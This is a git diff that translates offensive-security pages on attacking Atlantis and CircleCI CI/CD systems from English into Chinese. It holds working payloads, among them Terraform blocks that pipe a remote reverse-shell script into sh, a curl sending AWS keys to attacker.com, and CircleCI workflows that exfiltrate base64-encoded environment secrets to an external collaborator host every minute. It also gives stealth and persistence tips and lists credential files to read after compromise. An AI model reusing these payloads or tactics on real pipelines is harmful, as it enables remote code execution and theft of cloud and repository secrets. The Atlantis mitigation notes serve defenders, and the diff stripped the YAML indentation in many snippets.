+您可以通过让[**Atlantis加载外部数据源**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source)来做到这一点。只需在`main.tf`文件中放入如下有效负载:
```json
data "external" "example" {
- program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
+program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
}
```
+**更隐蔽的攻击**
-**Stealthier Attack**
-
-You can perform this attack even in a **stealthier way**, by following this suggestions:
-
-- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell:
+您可以通过遵循以下建议以**更隐蔽的方式**执行此攻击:
+- 不要直接将反向 shell 添加到 terraform 文件中,您可以**加载一个外部资源**,该资源包含反向 shell:
```javascript
module "not_rev_shell" {
- source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
+source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
}
```
+您可以在 [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) 找到 rev shell 代码。
-You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules)
+- 在外部资源中,使用 **ref** 功能来隐藏 **repo 中分支的 terraform rev shell 代码**,类似于:`git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
+- **而不是** 创建一个 **PR 到 master** 来触发 Atlantis,**创建 2 个分支**(test1 和 test2),并从一个分支创建一个 **PR 到另一个分支**。当您完成攻击后,只需 **删除 PR 和分支**。
-- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
-- **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**.
-
-#### Atlantis plan Secrets Dump
-
-You can **dump secrets used by terraform** running `atlantis plan` (`terraform plan`) by putting something like this in the terraform file:
+#### Atlantis 计划秘密转储
+您可以通过在 terraform 文件中放置类似以下内容来 **转储 terraform 使用的秘密**,运行 `atlantis plan`(`terraform plan`):
```json
output "dotoken" {
- value = nonsensitive(var.do_token)
+value = nonsensitive(var.do_token)
}
```
+#### Atlantis apply RCE - 在新PR中修改配置
-#### Atlantis apply RCE - Config modification in new PR
+如果您对一个仓库具有写入权限,您将能够在其上创建一个新分支并生成一个PR。如果您可以**执行 `atlantis apply`,您将能够在Atlantis服务器内部进行RCE**。
-If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**.
+然而,您通常需要绕过一些保护措施:
-However, you will usually need to bypass some protections:
-
-- **Mergeable**: If this protection is set in Atlantis, you can only run **`atlantis apply` if the PR is mergeable** (which means that the branch protection need to be bypassed).
- - Check potential [**branch protections bypasses**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
-- **Approved**: If this protection is set in Atlantis, some **other user must approve the PR** before you can run `atlantis apply`
- - By default you can abuse the [**Gitbot token to bypass this protection**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
-
-Running **`terraform apply` on a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
-You just need to make sure some payload like the following ones ends in the `main.tf` file:
+- **可合并**:如果在Atlantis中设置了此保护,您只能在**PR可合并时运行 `atlantis apply`**(这意味着需要绕过分支保护)。
+- 检查潜在的[**分支保护绕过**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
+- **已批准**:如果在Atlantis中设置了此保护,**其他用户必须批准PR**,您才能运行 `atlantis apply`
+- 默认情况下,您可以滥用[**Gitbot令牌来绕过此保护**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
+在恶意Terraform文件上运行**`terraform apply`,使用**[**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**。**\
+您只需确保一些有效载荷,如以下内容,结束在 `main.tf` 文件中:
```json
// Payload 1 to just steal a secret
resource "null_resource" "secret_stealer" {
- provisioner "local-exec" {
- command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
- }
+provisioner "local-exec" {
+command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
+}
}
// Payload 2 to get a rev shell
resource "null_resource" "rev_shell" {
- provisioner "local-exec" {
- command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
- }
+provisioner "local-exec" {
+command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
+}
}
```
+遵循**前一种技术的建议**以更**隐蔽的方式**执行此攻击。
-Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way**.
-
-#### Terraform Param Injection
-
-When running `atlantis plan` or `atlantis apply` terraform is being run under-needs, you can pass commands to terraform from atlantis commenting something like:
+#### Terraform 参数注入
+当运行 `atlantis plan` 或 `atlantis apply` 时,terraform 在后台运行,您可以通过在 atlantis 中评论类似的内容来向 terraform 传递命令:
```bash
atlantis plan --
atlantis plan -- -h #Get terraform plan help
@@ -256,18 +243,17 @@ atlantis plan -- -h #Get terraform plan help
atlantis apply --
atlantis apply -- -h #Get terraform apply help
```
+可以传递的内容是环境变量,这可能有助于绕过某些保护。请查看 terraform 环境变量在 [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables)
-Something you can pass are env variables which might be helpful to bypass some protections. Check terraform env vars in [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables)
+#### 自定义工作流
-#### Custom Workflow
-
-Running **malicious custom build commands** specified in an `atlantis.yaml` file. Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** of `master`.\
-This possibility was mentioned in a previous section:
+运行在 `atlantis.yaml` 文件中指定的 **恶意自定义构建命令**。Atlantis 使用来自拉取请求分支的 `atlantis.yaml` 文件,**而不是** `master`。\
+这个可能性在前面的部分中提到过:
> [!CAUTION]
-> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used.
+> 如果 [**服务器端配置**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) 标志 `allow_custom_workflows` 设置为 **True**,则可以在每个仓库的 **`atlantis.yaml`** 文件中 **指定** 工作流。还可能需要 **`allowed_overrides`** 也指定 **`workflow`** 以 **覆盖将要使用的工作流**。
>
-> This will basically give **RCE in the Atlantis server to any user that can access that repo**.
+> 这基本上会给 **任何可以访问该仓库的用户在 Atlantis 服务器上提供 RCE**。
>
> ```yaml
> # atlantis.yaml
@@ -286,99 +272,97 @@ This possibility was mentioned in a previous section:
> - run: my custom apply command
> ```
-#### Bypass plan/apply protections
-
-If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allowed_overrides` _has_ `apply_requirements` configured, it's possible for a repo to **modify the plan/apply protections to bypass them**.
+#### 绕过计划/应用保护
+如果 [**服务器端配置**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) 标志 `allowed_overrides` _已_ 配置 `apply_requirements`,则仓库可以 **修改计划/应用保护以绕过它们**。
```yaml
repos:
- - id: /.*/
- apply_requirements: []
+- id: /.*/
+apply_requirements: []
```
-
#### PR Hijacking
-If someone sends **`atlantis plan/apply` comments on your valid pull requests,** it will cause terraform to run when you don't want it to.
+如果有人在您的有效拉取请求上发送 **`atlantis plan/apply`** 评论,这将导致 terraform 在您不希望它运行时执行。
-Moreover, if you don't have configured in the **branch protection** to ask to **reevaluate** every PR when a **new commit is pushed** to it, someone could **write malicious configs** (check previous scenarios) in the terraform config, run `atlantis plan/apply` and gain RCE.
+此外,如果您没有在 **分支保护** 中配置在 **新提交推送** 到它时要求 **重新评估** 每个 PR,那么有人可能会在 terraform 配置中 **编写恶意配置**(查看之前的场景),运行 `atlantis plan/apply` 并获得 RCE。
-This is the **setting** in Github branch protections:
+这是 Github 分支保护中的 **设置**:
.png>)
#### Webhook Secret
-If you manage to **steal the webhook secret** used or if there **isn't any webhook secret** being used, you could **call the Atlantis webhook** and **invoke atlatis commands** directly.
+如果您设法 **窃取 webhook secret** 或者 **没有使用任何 webhook secret**,您可以 **调用 Atlantis webhook** 并 **直接调用 atlantis 命令**。
#### Bitbucket
-Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs.
+Bitbucket Cloud **不支持 webhook secrets**。这可能允许攻击者 **伪造来自 Bitbucket 的请求**。确保您只允许 Bitbucket 的 IP。
-- This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket.
-- If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos.
-- To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses).
+- 这意味着 **攻击者** 可以向 **Atlantis** 发出看似来自 Bitbucket 的 **虚假请求**。
+- 如果您指定了 `--repo-allowlist`,那么他们只能伪造与那些仓库相关的请求,因此他们能造成的最大损害就是在您自己的仓库上进行计划/应用。
+- 为了防止这种情况,请允许 [Bitbucket 的 IP 地址](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html)(请参见出站 IPv4 地址)。
### Post-Exploitation
-If you managed to get access to the server or at least you got a LFI there are some interesting things you should try to read:
+如果您设法访问了服务器,或者至少获得了 LFI,有一些有趣的内容您应该尝试读取:
-- `/home/atlantis/.git-credentials` Contains vcs access credentials
-- `/atlantis-data/atlantis.db` Contains vcs access credentials with more info
-- `/atlantis-data/repos/`_`/`_`////.terraform/terraform.tfstate` Terraform stated file
- - Example: /atlantis-data/repos/ghOrg\_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate
-- `/proc/1/environ` Env variables
-- `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data)
+- `/home/atlantis/.git-credentials` 包含 vcs 访问凭据
+- `/atlantis-data/atlantis.db` 包含更多信息的 vcs 访问凭据
+- `/atlantis-data/repos/`_`/`_`////.terraform/terraform.tfstate` Terraform 状态文件
+- 示例:/atlantis-data/repos/ghOrg\_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate
+- `/proc/1/environ` 环境变量
+- `/proc/[2-20]/cmdline` `atlantis server` 的命令行(可能包含敏感数据)
### Mitigations
#### Don't Use On Public Repos
-Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings.
+因为任何人都可以在公共拉取请求上评论,即使有所有可用的安全缓解措施,在没有适当配置安全设置的情况下,在公共仓库上运行 Atlantis 仍然是危险的。
#### Don't Use `--allow-fork-prs`
-If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo.
+如果您在公共仓库上运行(不推荐,见上文),您不应该设置 `--allow-fork-prs`(默认为 false),因为任何人都可以从他们的分叉向您的仓库打开拉取请求。
#### `--repo-allowlist`
-Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example:
+Atlantis 要求您通过 `--repo-allowlist` 标志指定一个允许列表,接受来自该列表的 webhook。例如:
-- Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
-- Your whole organization: `--repo-allowlist=github.com/runatlantis/*`
-- Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*`
-- All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret.
+- 特定仓库:`--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
+- 您的整个组织:`--repo-allowlist=github.com/runatlantis/*`
+- 您的 GitHub 企业安装中的每个仓库:`--repo-allowlist=github.yourcompany.com/*`
+- 所有仓库:`--repo-allowlist=*`。在受保护的网络中使用时很有用,但如果没有设置 webhook secret 则很危险。
-This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.
+此标志确保您的 Atlantis 安装不会与您不控制的仓库一起使用。有关更多详细信息,请参见 `atlantis server --help`。
#### Protect Terraform Planning
-If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) or by specifying a malicious provider. This code could then exfiltrate your credentials.
+如果攻击者提交带有恶意 Terraform 代码的拉取请求在您的威胁模型中,那么您必须意识到 `terraform apply` 的批准是不够的。可以使用 [`external` 数据源](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) 或通过指定恶意提供程序在 `terraform plan` 中运行恶意代码。然后,这段代码可能会窃取您的凭据。
-To prevent this, you could:
+为了防止这种情况,您可以:
-1. Bake providers into the Atlantis image or host and deny egress in production.
-2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry.
-3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here.
+1. 将提供程序打包到 Atlantis 镜像中或托管并在生产中拒绝出站。
+2. 在内部实现提供程序注册协议并拒绝公共出站,这样您可以控制谁有写入注册表的权限。
+3. 修改您的 [服务器端仓库配置](https://www.runatlantis.io/docs/server-side-repo-config.html) 的 `plan` 步骤,以验证不允许的提供程序或数据源的使用或不允许用户的 PR。您还可以在此时添加额外的验证,例如在允许 `plan` 继续之前要求 PR 上的“点赞”。Conftest 在这里可能会有用。
#### Webhook Secrets
-Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
+Atlantis 应该通过 `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` 环境变量设置 webhook secrets。即使设置了 `--repo-allowlist` 标志,如果没有 webhook secret,攻击者也可以伪装成允许列表中的仓库向 Atlantis 发出请求。Webhook secrets 确保 webhook 请求实际上来自您的 VCS 提供商(GitHub 或 GitLab)。
-If you are using Azure DevOps, instead of webhook secrets add a basic username and password.
+如果您使用 Azure DevOps,请添加基本用户名和密码,而不是 webhook secrets。
#### Azure DevOps Basic Authentication
-Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location.
+Azure DevOps 支持在所有 webhook 事件中发送基本身份验证头。这需要为您的 webhook 位置使用 HTTPS URL。
#### SSL/HTTPS
-If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags.
+如果您使用 webhook secrets,但您的流量是通过 HTTP,那么 webhook secrets 可能会被窃取。使用 `--ssl-cert-file` 和 `--ssl-key-file` 标志启用 SSL/HTTPS。
#### Enable Authentication on Atlantis Web Server
-It is very recommended to enable authentication in the web service. Enable BasicAuth using the `--web-basic-auth=true` and setup a username and a password using `--web-username=yourUsername` and `--web-password=yourPassword` flags.
+强烈建议在 Web 服务中启用身份验证。使用 `--web-basic-auth=true` 启用 BasicAuth,并使用 `--web-username=yourUsername` 和 `--web-password=yourPassword` 标志设置用户名和密码。
-You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`.
+您还可以将这些作为环境变量传递 `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` 和 `ATLANTIS_WEB_PASSWORD=yourPassword`。
### References
@@ -386,7 +370,3 @@ You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true`
- [**https://www.runatlantis.io/docs/provider-credentials.html**](https://www.runatlantis.io/docs/provider-credentials.html)
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/circleci-security.md b/src/pentesting-ci-cd/circleci-security.md
index 8b8a1fea1..4320ea6d3 100644
--- a/src/pentesting-ci-cd/circleci-security.md
+++ b/src/pentesting-ci-cd/circleci-security.md
@@ -1,259 +1,235 @@
-# CircleCI Security
+# CircleCI 安全
{{#include ../banners/hacktricks-training.md}}
-### Basic Information
+### 基本信息
-[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you can **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example.
+[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) 是一个持续集成平台,您可以在其中**定义模板**,指示您希望它对某些代码做什么以及何时执行。通过这种方式,您可以**自动化测试**或**部署**,例如直接**从您的代码库主分支**进行。
-### Permissions
+### 权限
-**CircleCI** **inherits the permissions** from github and bitbucket related to the **account** that logs in.\
-In my testing I checked that as long as you have **write permissions over the repo in github**, you are going to be able to **manage its project settings in CircleCI** (set new ssh keys, get project api keys, create new branches with new CircleCI configs...).
+**CircleCI** **继承了**与登录的**账户**相关的github和bitbucket的权限。\
+在我的测试中,我检查到,只要您在github上对代码库拥有**写权限**,您就能够**管理CircleCI中的项目设置**(设置新的ssh密钥,获取项目api密钥,使用新的CircleCI配置创建新分支...)。
-However, you need to be a a **repo admin** in order to **convert the repo into a CircleCI project**.
+然而,您需要是**代码库管理员**才能**将代码库转换为CircleCI项目**。
-### Env Variables & Secrets
+### 环境变量和秘密
-According to [**the docs**](https://circleci.com/docs/2.0/env-vars/) there are different ways to **load values in environment variables** inside a workflow.
+根据[**文档**](https://circleci.com/docs/2.0/env-vars/),在工作流中有不同的方法来**加载环境变量中的值**。
-#### Built-in env variables
+#### 内置环境变量
-Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`.
+每个由CircleCI运行的容器将始终具有[**文档中定义的特定环境变量**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables),如`CIRCLE_PR_USERNAME`、`CIRCLE_PROJECT_REPONAME`或`CIRCLE_USERNAME`。
-#### Clear text
-
-You can declare them in clear text inside a **command**:
+#### 明文
+您可以在**命令**中以明文声明它们:
```yaml
- run:
- name: "set and echo"
- command: |
- SECRET="A secret"
- echo $SECRET
+name: "set and echo"
+command: |
+SECRET="A secret"
+echo $SECRET
```
-
-You can declare them in clear text inside the **run environment**:
-
+您可以在 **run environment** 中以明文声明它们:
```yaml
- run:
- name: "set and echo"
- command: echo $SECRET
- environment:
- SECRET: A secret
+name: "set and echo"
+command: echo $SECRET
+environment:
+SECRET: A secret
```
-
-You can declare them in clear text inside the **build-job environment**:
-
+您可以在 **build-job environment** 中以明文声明它们:
```yaml
jobs:
- build-job:
- docker:
- - image: cimg/base:2020.01
- environment:
- SECRET: A secret
+build-job:
+docker:
+- image: cimg/base:2020.01
+environment:
+SECRET: A secret
```
-
-You can declare them in clear text inside the **environment of a container**:
-
+您可以在 **容器的环境** 中以明文声明它们:
```yaml
jobs:
- build-job:
- docker:
- - image: cimg/base:2020.01
- environment:
- SECRET: A secret
+build-job:
+docker:
+- image: cimg/base:2020.01
+environment:
+SECRET: A secret
```
+#### 项目秘密
-#### Project Secrets
-
-These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\
-You can see them **declared in** _https://app.circleci.com/settings/project/github/\/\/environment-variables_
+这些是**秘密**,只有**项目**(通过**任何分支**)可以**访问**。\
+您可以在 _https://app.circleci.com/settings/project/github/\/\/environment-variables_ 中查看它们的**声明**。
.png>)
> [!CAUTION]
-> The "**Import Variables**" functionality allows to **import variables from other projects** to this one.
+> "**导入变量**" 功能允许从其他项目**导入变量**到这个项目。
-#### Context Secrets
+#### 上下文秘密
-These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here:
+这些是**组织范围内**的秘密。默认情况下,**任何仓库**都可以**访问**存储在这里的任何秘密:
.png>)
> [!TIP]
-> However, note that a different group (instead of All members) can be **selected to only give access to the secrets to specific people**.\
-> This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people.
+> 但是,请注意,可以选择不同的组(而不是所有成员)来**仅向特定人员提供秘密的访问权限**。\
+> 这目前是**提高秘密安全性**的最佳方法之一,不允许所有人访问,而只是一些人。
-### Attacks
+### 攻击
-#### Search Clear Text Secrets
+#### 搜索明文秘密
-If you have **access to the VCS** (like github) check the file `.circleci/config.yml` of **each repo on each branch** and **search** for potential **clear text secrets** stored in there.
+如果您有**访问VCS**(如github),请检查**每个仓库每个分支**的文件 `.circleci/config.yml` 并**搜索**潜在的**明文秘密**。
-#### Secret Env Vars & Context enumeration
+#### 秘密环境变量和上下文枚举
-Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\/contexts_.
+检查代码,您可以找到在每个 `.circleci/config.yml` 文件中**使用**的**所有秘密名称**。您还可以从这些文件中获取**上下文名称**,或在网页控制台中查看:_https://app.circleci.com/settings/organization/github/\/contexts_。
-#### Exfiltrate Project secrets
+#### 外泄项目秘密
> [!WARNING]
-> In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_).
+> 为了**外泄所有**项目和上下文的**秘密**,您**只需**对整个github组织中的**1个仓库**拥有**写入**权限(_并且您的账户必须有访问上下文的权限,但默认情况下每个人都可以访问每个上下文_)。
> [!CAUTION]
-> The "**Import Variables**" functionality allows to **import variables from other projects** to this one. Therefore, an attacker could **import all the project variables from all the repos** and then **exfiltrate all of them together**.
-
-All the project secrets always are set in the env of the jobs, so just calling env and obfuscating it in base64 will exfiltrate the secrets in the **workflows web log console**:
+> "**导入变量**" 功能允许从其他项目**导入变量**到这个项目。因此,攻击者可以**导入所有仓库的所有项目变量**,然后**一起外泄所有变量**。
+所有项目秘密始终在作业的环境中设置,因此只需调用环境并将其混淆为base64,就会在**工作流网页日志控制台**中外泄秘密:
```yaml
version: 2.1
jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - run:
- name: "Exfil env"
- command: "env | base64"
+exfil-env:
+docker:
+- image: cimg/base:stable
+steps:
+- checkout
+- run:
+name: "Exfil env"
+command: "env | base64"
workflows:
- exfil-env-workflow:
- jobs:
- - exfil-env
+exfil-env-workflow:
+jobs:
+- exfil-env
```
-
-If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **create a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**:
-
+如果您**无法访问网络控制台**,但您有**对代码库的访问权限**并且知道使用了CircleCI,您可以**创建一个工作流**,该工作流**每分钟触发一次**并且**将秘密导出到外部地址**:
```yaml
version: 2.1
jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - run:
- name: "Exfil env"
- command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
+exfil-env:
+docker:
+- image: cimg/base:stable
+steps:
+- checkout
+- run:
+name: "Exfil env"
+command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
# I filter by the repo branch where this config.yaml file is located: circleci-project-setup
workflows:
- exfil-env-workflow:
- triggers:
- - schedule:
- cron: "* * * * *"
- filters:
- branches:
- only:
- - circleci-project-setup
- jobs:
- - exfil-env
+exfil-env-workflow:
+triggers:
+- schedule:
+cron: "* * * * *"
+filters:
+branches:
+only:
+- circleci-project-setup
+jobs:
+- exfil-env
```
+#### 导出上下文秘密
-#### Exfiltrate Context Secrets
-
-You need to **specify the context name** (this will also exfiltrate the project secrets):
-
+您需要**指定上下文名称**(这也将导出项目秘密):
```yaml
version: 2.1
jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - run:
- name: "Exfil env"
- command: "env | base64"
+exfil-env:
+docker:
+- image: cimg/base:stable
+steps:
+- checkout
+- run:
+name: "Exfil env"
+command: "env | base64"
workflows:
- exfil-env-workflow:
- jobs:
- - exfil-env:
- context: Test-Context
+exfil-env-workflow:
+jobs:
+- exfil-env:
+context: Test-Context
```
-
-If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **modify a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**:
-
+如果您**无法访问网络控制台**,但您有**对代码库的访问权限**并且知道使用了CircleCI,您可以**修改一个每分钟触发的工作流**,并且该工作流**将秘密导出到外部地址**:
```yaml
version: 2.1
jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - run:
- name: "Exfil env"
- command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
+exfil-env:
+docker:
+- image: cimg/base:stable
+steps:
+- checkout
+- run:
+name: "Exfil env"
+command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
# I filter by the repo branch where this config.yaml file is located: circleci-project-setup
workflows:
- exfil-env-workflow:
- triggers:
- - schedule:
- cron: "* * * * *"
- filters:
- branches:
- only:
- - circleci-project-setup
- jobs:
- - exfil-env:
- context: Test-Context
+exfil-env-workflow:
+triggers:
+- schedule:
+cron: "* * * * *"
+filters:
+branches:
+only:
+- circleci-project-setup
+jobs:
+- exfil-env:
+context: Test-Context
```
-
> [!WARNING]
-> Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**.
+> 仅仅在一个仓库中创建一个新的 `.circleci/config.yml` **并不足以触发 circleci 构建**。你需要在 **circleci 控制台中将其启用为项目**。
-#### Escape to Cloud
+#### 逃往云端
-**CircleCI** gives you the option to run **your builds in their machines or in your own**.\
-By default their machines are located in GCP, and you initially won't be able to fid anything relevant. However, if a victim is running the tasks in **their own machines (potentially, in a cloud env)**, you might find a **cloud metadata endpoint with interesting information on it**.
-
-Notice that in the previous examples it was launched everything inside a docker container, but you can also **ask to launch a VM machine** (which may have different cloud permissions):
+**CircleCI** 让你可以选择在 **他们的机器上或你自己的机器上运行构建**。\
+默认情况下,他们的机器位于 GCP,你最初无法找到任何相关信息。然而,如果受害者在 **他们自己的机器上(可能是在云环境中)** 运行任务,你可能会找到一个 **包含有趣信息的云元数据端点**。
+请注意,在之前的示例中,一切都是在 docker 容器内启动的,但你也可以 **请求启动一台虚拟机**(这可能具有不同的云权限):
```yaml
jobs:
- exfil-env:
- #docker:
- # - image: cimg/base:stable
- machine:
- image: ubuntu-2004:current
+exfil-env:
+#docker:
+# - image: cimg/base:stable
+machine:
+image: ubuntu-2004:current
```
-
-Or even a docker container with access to a remote docker service:
-
+或者甚至是一个可以访问远程 docker 服务的 docker 容器:
```yaml
jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - setup_remote_docker:
- version: 19.03.13
+exfil-env:
+docker:
+- image: cimg/base:stable
+steps:
+- checkout
+- setup_remote_docker:
+version: 19.03.13
```
+#### 持久性
-#### Persistence
-
-- It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access.
- - _https://app.circleci.com/settings/user/tokens_
-- It's possible to **create projects tokens** to access the project with the permissions given to the token.
- - _https://app.circleci.com/settings/project/github/\/\/api_
-- It's possible to **add SSH keys** to the projects.
- - _https://app.circleci.com/settings/project/github/\/\/ssh_
-- It's possible to **create a cron job in hidden branch** in an unexpected project that is **leaking** all the **context env** vars everyday.
- - Or even create in a branch / modify a known job that will **leak** all context and **projects secrets** everyday.
-- If you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor**
-- You can find a **command injection vulnerability** in some task and **inject commands** via a **secret** modifying its value
+- 可以在 CircleCI 中 **创建** **用户令牌** 以使用用户的访问权限访问 API 端点。
+- _https://app.circleci.com/settings/user/tokens_
+- 可以 **创建项目令牌** 以使用令牌授予的权限访问项目。
+- _https://app.circleci.com/settings/project/github/\/\/api_
+- 可以 **向项目添加 SSH 密钥**。
+- _https://app.circleci.com/settings/project/github/\/\/ssh_
+- 可以在一个意外的项目中 **创建一个隐藏分支的 cron 作业**,每天 **泄露** 所有 **上下文环境** 变量。
+- 或者甚至在一个分支中创建/修改一个已知的作业,每天 **泄露** 所有上下文和 **项目机密**。
+- 如果你是 GitHub 的所有者,你可以 **允许未验证的 orbs** 并在作业中将其配置为 **后门**。
+- 你可以在某些任务中找到 **命令注入漏洞** 并通过 **秘密** 修改其值来 **注入命令**。
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/cloudflare-security/README.md b/src/pentesting-ci-cd/cloudflare-security/README.md
index 77d2c2c50..ac8255488 100644
